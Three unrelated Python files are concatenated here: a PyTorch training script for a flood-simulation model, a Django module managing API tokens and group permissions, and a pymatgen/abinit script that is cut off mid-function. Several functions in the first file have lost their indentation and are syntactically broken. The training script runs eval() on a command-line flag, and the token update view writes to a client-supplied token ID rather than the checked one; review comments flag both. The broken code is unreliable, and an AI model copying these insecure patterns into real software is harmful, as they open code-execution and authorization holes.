from hydraulics import saint_venant
from models import detour
from models import swe_model
from utils import optimization
# Mapping from the --dtype flag string to the corresponding torch dtype.
_get_dtype = {'float32': torch.float32,
              'float16': torch.float16,
              'float64': torch.float64}
FLAGS = flags.FLAGS
# --- Run / bookkeeping flags ---
flags.DEFINE_string('comment', '',
                    'Comment for run. Ignored of log_dir is provided')
flags.DEFINE_string('device', 'cuda', 'Device to use.')
flags.DEFINE_string('dtype', 'float32',
                    f'Data type to use. {_get_dtype.keys()}')
# --- Model flags ---
flags.DEFINE_enum('model', 'detour', ['detour'], 'Down sample model')
flags.DEFINE_string('model_init', '',
                    'Path to model weights to be used at initialization.')
flags.DEFINE_boolean('group_norm', False, 'Use groupnorm instead of batchnorm.')
# --- Optimization flags ---
flags.DEFINE_integer('batch_size', 32, 'Batch size.')
flags.DEFINE_integer('epochs', 10, 'Number of epochs.')
flags.DEFINE_float('lr', 0.001, 'Learning rate.')
flags.DEFINE_string('lr_milestones', '[]',
                    'Decays the learning rate by gamma once the number of epoch'
                    ' reaches one of the milestones.')
flags.DEFINE_float('lr_gamma', 0.1,
                   'Multiplicative factor of learning rate decay. Used with'
                   ' milestones.')
flags.DEFINE_float('momentum', 0.9, 'Momentum.')
flags.DEFINE_float('weight_decay', 0.0, 'Weight decay.')
flags.DEFINE_float('regularization_lambda', 0.0, 'Regularization lambda.')
flags.DEFINE_boolean('debug', False, 'Produces debugging output.')
flags.DEFINE_enum('criterion', 'mse', ['mse', 'smooth_l1'], 'Loss function.')
flags.DEFINE_enum('optimizer', 'adam', ['adam', 'sgd'], 'Optimizer.')
flags.DEFINE_enum('regularization', 'smooth_l1', ['mse', 'smooth_l1'],
                  'Regularization loss function.')
# --- Physics / solver flags ---
flags.DEFINE_enum('ground_truth_type', 'rain', ['flux', 'rain'],
                  'Type of ground truth.')
flags.DEFINE_float('alpha', 0.7, 'CFL condition coefficient.')
flags.DEFINE_float('theta', 0.7, 'q centered weighting. [0,1].')
flags.DEFINE_integer('scale_factor', 16,
                     'Downsample factor from fine to coarse.')
# --- Distributed-training flags ---
flags.DEFINE_integer('world_size', torch.cuda.device_count(),
                     'number of distributed processes')
flags.DEFINE_integer('local_rank', -1, 'rank of distributed processes')
flags.DEFINE_string('dist_init', 'env://',
                    'init used to set up distributed training')
flags.DEFINE_string('dist_backend', 'nccl', 'distributed backend')
# Fixed seeds: the train seed also fixes model init and train sharding;
# the test seed fixes evaluation sharding.
_TRAIN_SEED = 214
_TEST_SEED = 123
# Batch size can be larger for test set.
TEST_BATCH_SIZE = 16
def _get_criterion(criterion: str):
    """Instantiate the loss module named by `criterion` ('mse', 'smooth_l1', 'inundation')."""
    losses = {'mse': nn.MSELoss, 'smooth_l1': nn.SmoothL1Loss,
              'inundation': optimization.InundationLoss}
    return losses[criterion]()
def _get_optimizer(optimizer: str, model: torch.nn.Module, **kwargs):
return {'adam': torch.optim.Adam, 'sgd': torch.optim.SGD}[optimizer](
model.parameters(), **kwargs)
def _flags_to_dict() -> Dict:
    """Return {flag_name: flag_value} for the key flags defined in main.py.

    Improvement: a single pass over the key flags instead of iterating the
    flag registry twice to build parallel name/value lists.
    """
    return {x.name: x.value for x in FLAGS.get_key_flags_for_module('main.py')}
def _namedtuple_to_json_file(args: NamedTuple, filename: str):
"""Converts namedtuple to readable dict format and saves it as json file."""
args_dict = []
for k, v in args._asdict().items():
if type(v) in {bool, str, int, float}:
args_dict.append({'Name': k, 'Value': v})
elif k == 'optimizer':
value = {'class': type(v).__name__}
for key in sorted(v.param_groups[0].keys()):
if key != 'params':
value[key] = v.param_groups[0][key]
args_dict.append({'Name': k, 'Value': value})
elif k == 'criterion' or k == 'regularization':
args_dict.append({'Name': k, 'Value': type(v).__name__})
with open(filename, 'w') as f:
json.dump(args_dict, f)
def _hyper_parameters(model, coarse_grid_size, coarse_resolution,
                      train_data) -> NamedTuple:
    """Bundle all flags plus derived training objects into one namedtuple.

    The tuple carries instantiated loss modules and the optimizer alongside
    scalar flag values, and is consumed by the trainer and checkpointing.
    """
    params = _flags_to_dict()
    params['PyTorch'] = torch.__version__
    params['dtype'] = _get_dtype[params['dtype']]
    params['coarse_dx'] = coarse_resolution
    params['coarse_n_x'] = coarse_grid_size
    params['fine_dx'] = train_data.resolution
    params['boundary_type'] = boundary.BoundaryType[
        train_data.boundary_type.upper()]
    # Loss modules are created here and moved to the configured device/dtype.
    params['criterion'] = _get_criterion(FLAGS.criterion).to(
        FLAGS.device, dtype=_get_dtype[FLAGS.dtype])
    params['regularization'] = _get_criterion(FLAGS.regularization).to(
        FLAGS.device, dtype=_get_dtype[FLAGS.dtype])
    optimizer_params = {'lr': FLAGS.lr, 'weight_decay': FLAGS.weight_decay,
                        'momentum': FLAGS.momentum}
    if FLAGS.optimizer == 'adam':
        # Adam takes no momentum argument; drop it before construction.
        optimizer_params.pop('momentum')
    params['optimizer'] = _get_optimizer(FLAGS.optimizer, model,
                                         **optimizer_params)
    params['local_rank'] = FLAGS.local_rank
    params['world_size'] = FLAGS.world_size
    # Sorted keys give the namedtuple a stable field order across runs.
    Args = collections.namedtuple('HyperParameters', sorted(params))
    return Args(**params)
def main(_):
    """Entry point: set up (optionally distributed) training and run epochs."""
    if FLAGS.debug:
        torch.set_printoptions(precision=5, linewidth=230, sci_mode=False)
    # Fixed seed so every process initializes identical model weights.
    torch.manual_seed(_TRAIN_SEED)
    torch.cuda.manual_seed(_TRAIN_SEED)
    if FLAGS.local_rank >= 0:
        # local_rank >= 0 means we were launched by torch.distributed.launch.
        dist.init_process_group(backend=FLAGS.dist_backend,
                                init_method=FLAGS.dist_init,
                                world_size=FLAGS.world_size,
                                rank=FLAGS.local_rank)
        torch.cuda.set_device(FLAGS.local_rank)
    if FLAGS.local_rank <= 0:
        # Rank 0 (or the single process, rank == -1) owns logging/tensorboard.
        FLAGS.alsologtostderr = True
        tb.init(FLAGS.log_dir, FLAGS.comment)
        logging.get_absl_handler().use_absl_log_file('Logger', tb.get_log_dir())
    ground_truth_type = data.GroundTruthType[FLAGS.ground_truth_type.upper()]
    train_data = data.USGS(ground_truth_type=ground_truth_type, train_set=True)
    test_data = data.USGS(ground_truth_type=ground_truth_type, train_set=False)
    if FLAGS.local_rank <= 0:
        logging.info(f'USGS-1m loaded with {len(train_data)} train samples, '
                     f'{len(test_data)} test samples')
    if FLAGS.local_rank >= 0:
        # Distributed mode: each process consumes a disjoint shard.
        train_sampler = dist_data.DistributedSampler(train_data,
                                                     seed=_TRAIN_SEED)
        test_sampler = dist_data.DistributedSampler(test_data, seed=_TEST_SEED,
                                                    shuffle=False)
    else:
        train_sampler = None
        test_sampler = None
    train_data_loader = torch.utils.data.DataLoader(
        train_data, shuffle=(train_sampler is None), sampler=train_sampler,
        batch_size=FLAGS.batch_size)
    test_data_loader = torch.utils.data.DataLoader(
        test_data, shuffle=False, sampler=test_sampler,
        batch_size=TEST_BATCH_SIZE)
    # The coarse grid is the fine grid downsampled by scale_factor.
    coarse_grid_size = int(train_data.grid_size // FLAGS.scale_factor)
    coarse_resolution = train_data.resolution * FLAGS.scale_factor
    solver = saint_venant.SaintVenantFlux(coarse_grid_size, coarse_resolution,
                                          FLAGS.theta)
    solver.to_gpu()
    if 'detour' in FLAGS.model:
        downsample_model = detour.resnet(FLAGS.group_norm)
    else:
        raise ValueError('Unsupported model type.')
    if FLAGS.local_rank <= 0:
        logging.info(downsample_model)
    model = swe_model.SweModel(downsample_model, solver, coarse_resolution,
                               coarse_grid_size, FLAGS.alpha)
    model = model.cuda()
    if bool(FLAGS.model_init):
        # Warm-start the downsample network from a saved checkpoint.
        device = FLAGS.local_rank if FLAGS.local_rank >= 0 else 0
        checkpoint = torch.load(FLAGS.model_init,
                                map_location=torch.device(device))
        model.downsample_model.load_state_dict(checkpoint['state_dict'])
        if FLAGS.local_rank <= 0:
            logging.info('Model initialized with state dict %s',
                         FLAGS.model_init)
    if FLAGS.local_rank >= 0:
        device_ids = [FLAGS.local_rank]
        model = nn.parallel.DistributedDataParallel(model,
                                                    device_ids=device_ids,
                                                    output_device=device_ids[0])
    # SECURITY NOTE(review): eval() executes arbitrary code from a command-line
    # flag; ast.literal_eval(FLAGS.lr_milestones) would parse the list safely.
    FLAGS.lr_milestones = eval(FLAGS.lr_milestones)
    args = _hyper_parameters(model, coarse_grid_size, coarse_resolution,
                             train_data)
    if FLAGS.local_rank <= 0:
        logging.info(args)
        logging.info('Number of model parameters: %s',
                     sum([p.numel() for p in model.parameters()]))
        tb.log_hyper_parameters(args._asdict())
        _namedtuple_to_json_file(args, tb.get_log_dir() + '/args.json')
    if FLAGS.lr_milestones:
        scheduler = torch.optim.lr_scheduler.MultiStepLR(
            args.optimizer, FLAGS.lr_milestones, gamma=FLAGS.lr_gamma,
            verbose=True if FLAGS.local_rank <= 0 else False)
    best_validation_loss = float('inf')
    for epoch in range(FLAGS.epochs):
        if FLAGS.local_rank >= 0:
            # Reshuffle each epoch's shard assignment deterministically.
            train_sampler.set_epoch(epoch)
            test_sampler.set_epoch(epoch)
        train_loss = trainer.train(epoch, model, train_data_loader, args)
        validation_loss = trainer.validate(epoch, model, test_data_loader, args)
        if FLAGS.lr_milestones:
            scheduler.step()
        if FLAGS.local_rank <= 0:
            # DDP wraps the model in .module; unwrap before checkpointing.
            if FLAGS.local_rank < 0:
                state_dict = model.downsample_model.state_dict()
            else:
                state_dict = model.module.downsample_model.state_dict()
            torch.save({'epoch': epoch, 'args': args._asdict(),
                        'state_dict': state_dict},
                       tb.get_log_dir() + f'/checkpoint.pth')
            # Keep a separate copy of the best-so-far model.
            if validation_loss < best_validation_loss:
                best_validation_loss = validation_loss
                torch.save({'epoch': epoch, 'args': args._asdict(),
                            'state_dict': state_dict},
                           tb.get_log_dir() + f'/best_checkpoint.pth')
            logging.info(
                f'\nResults - Epoch: {epoch}\tTraining Loss {train_loss:.4f}\t'
                f'Validation Loss {validation_loss:.4f}\n')
            tb.log_scalars(epoch, write_hparams=True, train_loss=train_loss,
                           validation_loss=validation_loss)
if __name__ == '__main__':
# CUDA_VISIBLE_DEVICES=0,1,2,3 python -m torch.distributed.launch --nproc_per_node=4 --master_port 29499 main.py --batch_size 1 --debug --epochs 50 --regularization_lambda 0.5
app.run(main)
|
# Copyright 2019 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
[概要]
トークンページのデータ処理
"""
import sys
import copy
import pytz
import datetime
import hashlib
import json
import traceback
import re
import socket
import urllib.parse
import secrets
import ast
from pytz import timezone
from django.http import HttpResponse, Http404
from django.shortcuts import render,redirect
from django.db.models import Q, Max
from django.db import transaction
from django.views.decorators.http import require_POST
from django.urls import reverse
from django.conf import settings
from libs.commonlibs import define as defs
from libs.commonlibs.common import Common
from libs.commonlibs.oase_logger import OaseLogger
from libs.webcommonlibs.decorator import *
from libs.webcommonlibs.oase_exception import OASEError
from libs.webcommonlibs.common import TimeConversion
from web_app.models.models import TokenInfo, TokenPermission, Group, AccessPermission
from web_app.templatetags.common import get_message
from web_app.serializers.unicode_check import UnicodeCheck
from importlib import import_module
from web_app.views.event.event import SigToken
logger = OaseLogger.get_instance()  # initialize logger
MENU_ID = 2141001009  # menu ID of the token page; used by check_allowed_auth / get_menu_auth_type
@check_allowed_auth(MENU_ID, defs.MENU_CATEGORY.ALLOW_EVERY)
def index(request):
    """
    [Summary]
    Render the token list screen: every token visible to the requesting
    user's groups, together with each token's per-group permission settings.
    """
    permission_type = request.user_config.get_menu_auth_type(MENU_ID)
    # Maintenance rights on this menu enable the edit controls in the template.
    hasUpdateAuthority = True if permission_type == defs.ALLOWED_MENTENANCE else False
    token_list = []
    token_id_list = []
    group_list = []
    token_perm_list = []
    logger.logic_log('LOSI00001', 'None', request=request)
    try:
        user_groups = request.user_config.group_id_list
        # Tokens the user may see: any with permission '1' for one of the user's groups.
        token_id_list = TokenPermission.objects.filter(
            group_id__in=user_groups, permission_type_id='1').values_list('token_id', flat=True).order_by('token_id')
        token = TokenInfo.objects.filter(
            token_id__in=token_id_list).order_by('token_id')
        group_list = Group.objects.filter(
            group_id__in=user_groups).values('group_id', 'group_name').order_by('group_id')
        group_info = {group['group_id']: group['group_name'] for group in group_list}
        # Default every (token, group) pair to permission 0 ("none").
        perm_info = {}
        for t in token:
            perm_info[t.token_id] = [
                {
                    'group_id'           : group['group_id'],
                    'group_name'         : group_info[group['group_id']],
                    'permission_type_id' : 0,
                }
                for group in group_list
            ]
        # Overlay the permissions actually stored in TokenPermission.
        tok_grp_info = {}
        TokPerm_list = TokenPermission.objects.filter().values(
            'token_id', 'group_id', 'permission_type_id').order_by('token_id')
        for tok in TokPerm_list:
            tok_id = tok['token_id']
            grp_id = tok['group_id']
            perm = tok['permission_type_id']
            # Skip rows for tokens/groups outside the user's view.
            if tok_id not in perm_info or grp_id not in group_info:
                continue
            tok_grp_info[(tok_id, grp_id)] = perm
        for tok_id, v_list in perm_info.items():
            for v in v_list:
                grp_id = v['group_id']
                if (tok_id, grp_id) in tok_grp_info:
                    v['permission_type_id'] = tok_grp_info[(tok_id, grp_id)]
        token_perm_list = perm_info
        for t in token:
            token_info = {
                'token_id'              : t.token_id,
                'token_name'            : t.token_name,
                'token_data'            : t.token_data,
                'use_start_time'        : t.use_start_time,
                'use_end_time'          : t.use_end_time,
                'last_update_timestamp' : t.last_update_timestamp,
                'last_update_user'      : t.last_update_user,
                'permission'            : token_perm_list.get(t.token_id, [])
            }
            token_list.append(token_info)
    except Exception as e:
        # Best effort: log the failure and render whatever was collected.
        logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
    data = {
        'token_list'         : token_list,
        'hasUpdateAuthority' : hasUpdateAuthority,
        'group_list'         : group_list,
    }
    data.update(request.user_config.get_templates_data(request))
    logger.logic_log('LOSI00002', 'token_count: %s' % (len(token_list)), request=request)
    return render(request,'rule/token.html',data)
@check_allowed_auth(MENU_ID, defs.MENU_CATEGORY.ALLOW_EVERY)
def delete(request, token_id):
    """
    [Summary]
    Delete the specified token and all of its per-group permission rows,
    then signal the event service so tokens are reloaded.
    Responds with JSON: {'status': 'success'|'failure', ...}.
    """
    logger.logic_log('LOSI00001', 'delete token request. token_id=%s' % (token_id), request=request)
    response_data = {
        'status' : 'success',
        'redirect_url' : reverse('web_app:rule:token'),
    }
    try:
        with transaction.atomic():
            # Lock the token row for the duration of the transaction
            tkn = TokenInfo.objects.select_for_update().get(token_id=token_id)
            # Permission check: requester needs maintenance rights on this token
            perm_flg = TokenPermission.objects.filter(
                token_id = token_id,
                group_id__in = request.user_config.group_id_list,
                permission_type_id = defs.ALLOWED_MENTENANCE
            ).exists()
            if not perm_flg:
                raise OASEError('MOSJA37016', 'LOSI37000', log_params=[token_id, request.user_config.group_id_list])
            # Delete the token and its permission rows
            tkn.delete()
            TokenPermission.objects.filter(token_id=token_id).delete()
    except TokenInfo.DoesNotExist:
        logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
        response_data['status'] = 'failure'
        response_data['error_msg'] = get_message('MOSJA37017', request.user.get_lang_mode())
    except OASEError as e:
        if e.log_id:
            if e.arg_list and isinstance(e.arg_list, list):
                logger.logic_log(e.log_id, *(e.arg_list), request=request)
            else:
                logger.logic_log(e.log_id, request=request)
        if e.msg_id:
            if e.arg_dict and isinstance(e.arg_dict, dict):
                msg = get_message(e.msg_id, request.user.get_lang_mode(), **(e.arg_dict))
            else:
                msg = get_message(e.msg_id, request.user.get_lang_mode())
        response_data['status'] = 'failure'
        response_data['error_msg'] = msg
    except Exception as e:
        logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
        response_data['status'] = 'failure'
        response_data['error_msg'] = get_message('MOSJA37015', request.user.get_lang_mode())
    logger.logic_log('LOSI00002', 'result:%s, token_id=%s' % (response_data['status'], token_id), request=request)
    # On success, send the signal so the token cache is reloaded
    if response_data['status'] == 'success':
        cls = SigToken()
        cls.send_sig()
    # Respond as JSON
    response_json = json.dumps(response_data)
    return HttpResponse(response_json, content_type="application/json")
@check_allowed_auth(MENU_ID, defs.MENU_CATEGORY.ALLOW_EVERY)
def update(request, token_id):
    """
    [Summary]
    Update the per-group permissions of the specified token.
    Responds with JSON: {'status': 'success'|'failure', ...}.
    """
    logger.logic_log('LOSI00001', 'update token request. token_id=%s' % (token_id), request=request)
    response_data = {
        'status' : 'success',
        'redirect_url' : reverse('web_app:rule:token'),
    }
    now = datetime.datetime.now(pytz.timezone('UTC'))
    try:
        with transaction.atomic():
            upd_record = request.POST.get('upd_record', "{}")
            upd_record = json.loads(upd_record)
            token_info = upd_record['token_info']
            # Permission check: requester needs maintenance rights on this token
            perm_flg = TokenPermission.objects.filter(
                token_id = token_id,
                group_id__in = request.user_config.group_id_list,
                permission_type_id = defs.ALLOWED_MENTENANCE
            ).exists()
            if not perm_flg:
                raise OASEError('MOSJA37028', 'LOSI37001', log_params=[token_id, request.user_config.group_id_list])
            # At least one group must retain permission ('1') after the update
            perm_count = 0
            for pm in token_info['permission']:
                if pm['permission_type_id'] == '1':
                    perm_count = perm_count + 1
            if perm_count < 1:
                raise OASEError('MOSJA37046', 'LOSI37007', log_params=['update', token_id])
            permission_list_reg = []
            for pm in token_info['permission']:
                # Only '0' (none) and '1' (allowed) are valid permission values
                if pm['permission_type_id'] != '0' and pm['permission_type_id'] != '1':
                    raise OASEError('MOSJA37034', 'LOSI37002', log_params=[token_id, pm['group_id'], pm['permission_type_id']])
                # NOTE(review): the reads/writes below key on the client-supplied
                # token_info['token_id'], not the permission-checked URL token_id
                # -- confirm the caller guarantees they always match.
                rcnt = TokenPermission.objects.filter(
                    token_id=token_info['token_id'],
                    group_id=pm['group_id']
                ).count()
                if rcnt > 0:
                    # Existing row: update in place
                    TokenPermission.objects.filter(
                        token_id=token_info['token_id'],
                        group_id=pm['group_id']
                    ).update(
                        permission_type_id = pm['permission_type_id'],
                        last_update_timestamp = now,
                        last_update_user = request.user.user_name
                    )
                else:
                    # New row: queue for bulk insert
                    permission_list_reg.append(
                        TokenPermission(
                            token_id=token_info['token_id'],
                            group_id = pm['group_id'],
                            permission_type_id = pm['permission_type_id'],
                            last_update_timestamp = now,
                            last_update_user = request.user.user_name
                        )
                    )
            if len(permission_list_reg) > 0:
                TokenPermission.objects.bulk_create(permission_list_reg)
    except OASEError as e:
        if e.log_id:
            if e.arg_list and isinstance(e.arg_list, list):
                logger.logic_log(e.log_id, *(e.arg_list), request=request)
            else:
                logger.logic_log(e.log_id, request=request)
        if e.msg_id:
            if e.arg_dict and isinstance(e.arg_dict, dict):
                msg = get_message(e.msg_id, request.user.get_lang_mode(), **(e.arg_dict))
            else:
                msg = get_message(e.msg_id, request.user.get_lang_mode())
        response_data['status'] = 'failure'
        response_data['error_msg'] = msg
    except Exception as e:
        logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
        response_data['status'] = 'failure'
        response_data['error_msg'] = get_message('MOSJA37027', request.user.get_lang_mode())
    logger.logic_log('LOSI00002', 'result:%s, token_id=%s' % (response_data['status'], token_id), request=request)
    response_json = json.dumps(response_data)
    return HttpResponse(response_json, content_type="application/json")
@check_allowed_auth(MENU_ID, defs.MENU_CATEGORY.ALLOW_EVERY)
def display(request):
    """
    [Summary]
    Re-display a token's value after re-authenticating the user by password.
    Responds with JSON: {'status': ..., 'msg': <token or error message>}.
    """
    logger.logic_log('LOSI00001', 're-display token request.', request=request)
    response_data = {
        'status' : 'failure',
        'msg'    : '',
    }
    # BUG FIX: tkn_id is referenced in the closing log line; initialize it
    # before the try so a parameter-parsing failure (e.g. non-numeric
    # 'tkn_id') does not raise NameError while the error is being handled.
    tkn_id = 0
    try:
        # Request parameters
        tkn_id = int(request.POST.get('tkn_id', '0'))
        passwd = request.POST.get('passwd', '')
        passwd = Common.oase_hash(passwd)
        # Permission check: requester needs maintenance rights on this token
        perm_flg = TokenPermission.objects.filter(
            token_id = tkn_id,
            group_id__in = request.user_config.group_id_list,
            permission_type_id = defs.ALLOWED_MENTENANCE
        ).exists()
        if not perm_flg:
            raise OASEError('MOSJA37035', 'LOSI37003', log_params=[tkn_id, request.user_config.group_id_list])
        # Re-authentication: hashed password must match the stored one
        if passwd != request.user.password:
            raise OASEError('MOSJA37036', 'LOSI37004', log_params=[tkn_id, ])
        # Fetch the token value
        tkn = TokenInfo.objects.get(token_id=tkn_id).token_data
        # Success response carries the token itself
        response_data['status'] = 'success'
        response_data['msg'] = tkn
    except TokenInfo.DoesNotExist:
        logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
        response_data['status'] = 'failure'
        response_data['msg'] = get_message('MOSJA37017', request.user.get_lang_mode())
    except OASEError as e:
        if e.log_id:
            if e.arg_list and isinstance(e.arg_list, list):
                logger.logic_log(e.log_id, *(e.arg_list), request=request)
            else:
                logger.logic_log(e.log_id, request=request)
        if e.msg_id:
            if e.arg_dict and isinstance(e.arg_dict, dict):
                msg = get_message(e.msg_id, request.user.get_lang_mode(), **(e.arg_dict))
            else:
                msg = get_message(e.msg_id, request.user.get_lang_mode())
        response_data['status'] = 'failure'
        response_data['msg'] = msg
    except Exception as e:
        logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
        response_data['status'] = 'failure'
        response_data['msg'] = get_message('MOSJA37037', request.user.get_lang_mode())
    logger.logic_log('LOSI00002', 'result:%s, token_id=%s' % (response_data['status'], tkn_id), request=request)
    # Respond as JSON
    response_json = json.dumps(response_data)
    return HttpResponse(response_json, content_type="application/json")
@check_allowed_auth(MENU_ID, defs.MENU_CATEGORY.ALLOW_ADMIN)
@require_POST
def create(request):
    """
    [Summary]
    Create a new token (POST only). Validates the token name, converts the
    optional expiry to UTC, persists TokenInfo plus its TokenPermission
    rows, signals a token reload, and returns the generated value as JSON.
    """
    logger.logic_log('LOSI00001', 'Create New Token', request=request)
    response_data = {
        'status' : 'success',
        'redirect_url' : reverse('web_app:rule:token'),
    }
    msg = ''
    error_msg = {
        'token_name' : '',
    }
    emo_chk = UnicodeCheck()
    now = datetime.datetime.now(pytz.timezone('UTC'))
    time_zone = settings.TIME_ZONE
    # Generate the token value (cryptographically random, URL-safe)
    token_value = secrets.token_urlsafe(24)
    # Request parameters
    token_name = request.POST.get('token-name', '')
    end_time = request.POST.get('token-end', '')
    token_perm = request.POST.get('token-perm', '[]')
    # NOTE(review): ast.literal_eval cannot execute code, but it parses
    # untrusted POST data outside the try block, so malformed input raises
    # an unhandled error here -- consider json.loads inside the try.
    token_perm = ast.literal_eval(token_perm)
    try:
        with transaction.atomic():
            # Token name: required
            if len(token_name) == 0:
                response_data['status'] = 'failure'
                error_msg['token_name'] += get_message('MOSJA37040', request.user.get_lang_mode()) + '\n'
            # Token name: max length 64
            if len(token_name) > 64:
                response_data['status'] = 'failure'
                error_msg['token_name'] += get_message('MOSJA37043', request.user.get_lang_mode()) + '\n'
            # Token name: forbidden (emoji) characters
            emo_flag = False
            value_list = emo_chk.is_emotion(token_name)
            if len(value_list) > 0:
                emo_flag = True
                response_data['status'] = 'failure'
                error_msg['token_name'] += get_message('MOSJA37044', request.user.get_lang_mode()) + '\n'
            # Token name: must be unique
            if not emo_flag and TokenInfo.objects.filter(token_name=token_name).exists():
                response_data['status'] = 'failure'
                error_msg['token_name'] += get_message('MOSJA37045', request.user.get_lang_mode()) + '\n'
            # Expiry: blank means the token never expires
            if end_time:
                end_time = TimeConversion.get_time_conversion_utc(
                    end_time, time_zone)
            else:
                end_time = None
            if len(error_msg['token_name']) != 0:
                raise Exception()
            # Permission values: only '0' (none) and '1' (allowed) are valid
            # (dead `permission_list_reg = []` initialization removed; the
            # list is built after the token row is saved below)
            for pm in token_perm:
                if pm['permission_type_id'] not in ['0', '1']:
                    raise OASEError('MOSJA37039', 'LOSI37006', log_params=[pm['group_id'], pm['permission_type_id']])
            # Persist the token
            token_info = TokenInfo(
                token_name = token_name,
                token_data = token_value,
                use_start_time = now,
                use_end_time = end_time,
                last_update_timestamp = now,
                last_update_user = request.user.user_name
            )
            token_info.save(force_insert=True)
            # Persist the per-group permissions in one bulk insert
            permission_list_reg = []
            for pm in token_perm:
                permission_list_reg.append(
                    TokenPermission(
                        token_id = token_info.token_id,
                        group_id = pm['group_id'],
                        permission_type_id = pm['permission_type_id'],
                        last_update_timestamp = now,
                        last_update_user = request.user.user_name
                    )
                )
            if len(permission_list_reg) > 0:
                TokenPermission.objects.bulk_create(permission_list_reg)
            response_data['status'] = 'success'
            response_data['redirect_url'] = '/oase_web/rule/token'
            response_data['token'] = token_value
    except OASEError as e:
        if e.log_id:
            if e.arg_list and isinstance(e.arg_list, list):
                logger.logic_log(e.log_id, *(e.arg_list), request=request)
            else:
                logger.logic_log(e.log_id, request=request)
        if e.msg_id:
            if e.arg_dict and isinstance(e.arg_dict, dict):
                msg = get_message(e.msg_id, request.user.get_lang_mode(), **(e.arg_dict))
            else:
                msg = get_message(e.msg_id, request.user.get_lang_mode())
        response_data['status'] = 'failure'
        response_data['msg'] = msg
    except Exception as e:
        # Validation failure or unexpected error: report per-field messages
        logger.system_log('LOSI00005', traceback.format_exc(), request=request)
        response_data['status'] = 'failure'
        response_data['error_msg'] = error_msg
    logger.logic_log('LOSI00002', 'status: %s' % (response_data['status']), request=request)
    # On success, send the signal so the token cache is reloaded
    if response_data['status'] == 'success':
        cls = SigToken()
        cls.send_sig()
    response_json = json.dumps(response_data)
    return HttpResponse(response_json, content_type="application/json")
|
#!/usr/bin/env python
import numpy
import os
import logging
import re
import itertools
import matplotlib.pyplot as plt
from pymatgen.io.abinitio.works import RelaxWork
from pymatgen.io.abinitio.tasks import TaskManager
from pymatgen.io.abinitio.flows import Flow
from pymatgen.io.abinitio.strategies import RelaxStrategy
from pymatgen.io.abinitio.abiobjects import KSampling, RelaxationMethod, AbiStructure
from pymatgen.core.units import Energy
from myscripts.pseudos import all_pseudos
from myscripts.structure import HalfHeusler
# Working directories on the cluster scratch filesystem.
scratchdir = '/p/lscratchd/damewood'
basename = 'LixMn4Z4'
workdir = os.path.join(scratchdir,basename)
logging.basicConfig()
# Task manager built from the user's abinitio configuration file.
manager = TaskManager.from_user_config()
# Lattice constants per Z species ('N'/'P'/'Si'), Li content ('Li1'..'Li3'),
# and structural phase (alpha/beta/gamma).
# NOTE(review): presumably optimized values from earlier relaxations -- confirm.
acell_opt = {
    'N': {
        'Li1' : {
            'alpha': 4.961,
            'beta' : 4.404,
            'gamma': 4.996,
        },
        'Li2' : {
            'alpha': 4.500,
            'beta' : 4.500,
            'gamma': 4.500,
        },
        'Li3' : {
            'alpha': 4.552,
            'beta' : 4.552,
            'gamma': 4.552,
        },
    },
    'P': {
        'Li1' : {
            'alpha': 5.300,
            'beta' : 5.422,
            'gamma': 5.260,
        },
        'Li2' : {
            'alpha': 5.220,
            'beta' : 5.220,
            'gamma': 5.220,
        },
        'Li3' : {
            'alpha': 5.502,
            'beta' : 5.502,
            'gamma': 5.502,
        },
    },
    'Si': {
        'Li1' : {
            'alpha': 4.894,
            'beta' : 5.527,
            'gamma': 5.517,
        },
        'Li2' : {
            'alpha': 4.894,
            'beta' : 5.527,
            'gamma': 5.517,
        },
        'Li3' : {
            'alpha': 5.629,
            'beta' : 5.778,
            'gamma': 5.788,
        },
    },
}
# 8x8x8 Monkhorst-Pack k-mesh with four shifts.
ksampling = KSampling(mode='monkhorst',kpts=((8,8,8),), kpt_shifts=((0.5,0.5,0.5),(0.5,0.0,0.0),(0.0,0.5,0.0),(0.0,0.0,0.5)))
relax_ion = RelaxationMethod(ionmov = 2, optcell = 0)      # relax ion positions only
relax_ioncell = RelaxationMethod(ionmov = 2, optcell = 1)  # relax ions and cell
pseudos = all_pseudos()
flows = []
# One flow per (Z species, vacancy count i); the cell keeps x = 4 - i Li atoms.
for (Z, i) in itertools.product(['P','N','Si'],range(1,4)):
    x = 4 - i
    name = u'Li%dMn4%s4' % (x,Z)
    print(name)
    flow = Flow(manager = manager, workdir = os.path.join(workdir, name))
    li = u'Li%d' % x
    for (phase) in ["alpha","beta","gamma"]:
        # Half-Heusler cell -> conventional supercell, then drop the first
        # i sites (assumed Li -- TODO confirm site ordering) and sort by Z.
        structure = HalfHeusler(['Li','Mn',Z], phase, acell_opt[Z][li][phase])
        structure.make_supercell([[-1,1,1],[1,-1,1],[1,1,-1]])
        structure.remove_sites(list(range(i)))
        structure.sort(key=lambda j: j.specie.Z)
        # Sanity check: the built structure matches the intended stoichiometry.
        assert name == structure.formula.replace(' ','')
        # Initial collinear spins along z: 1 on Li sites, 3 on Mn sites.
        spins = numpy.zeros([len(structure),3])
        for j,atom in enumerate(structure):
            if atom.specie.symbol == 'Li':
                spins[j,2] = 1.
            if atom.specie.symbol == 'Mn':
                spins[j,2] = 3.
        ion_input = RelaxStrategy(structure, pseudos, ksampling,
            relax_ion, accuracy="high", smearing = "fermi_dirac:0.025 eV",
            ecut = 40., pawecutdg = 80., chkprim = 0, tolmxf = 5.e-6,
            spinat = spins, restartxf = -2, nband = 60, nstep = 100)
        # Second stage reuses the same input but relaxes the cell too.
        ioncell_input = ion_input.copy()
        ioncell_input.relax_algo = relax_ioncell
        # Two-step relaxation: ions first, then ions + cell.
        work = RelaxWork(ion_input, ioncell_input, manager = manager)
        flow.register_work(work, workdir = phase)
    flow = flow.allocate()
    flows.append(flow)
def build_and_pickle_dump():
    """Build the working directories of every registered flow and pickle it to disk."""
    for fl in flows:
        fl.build_and_pickle_dump()
def rapidfire():
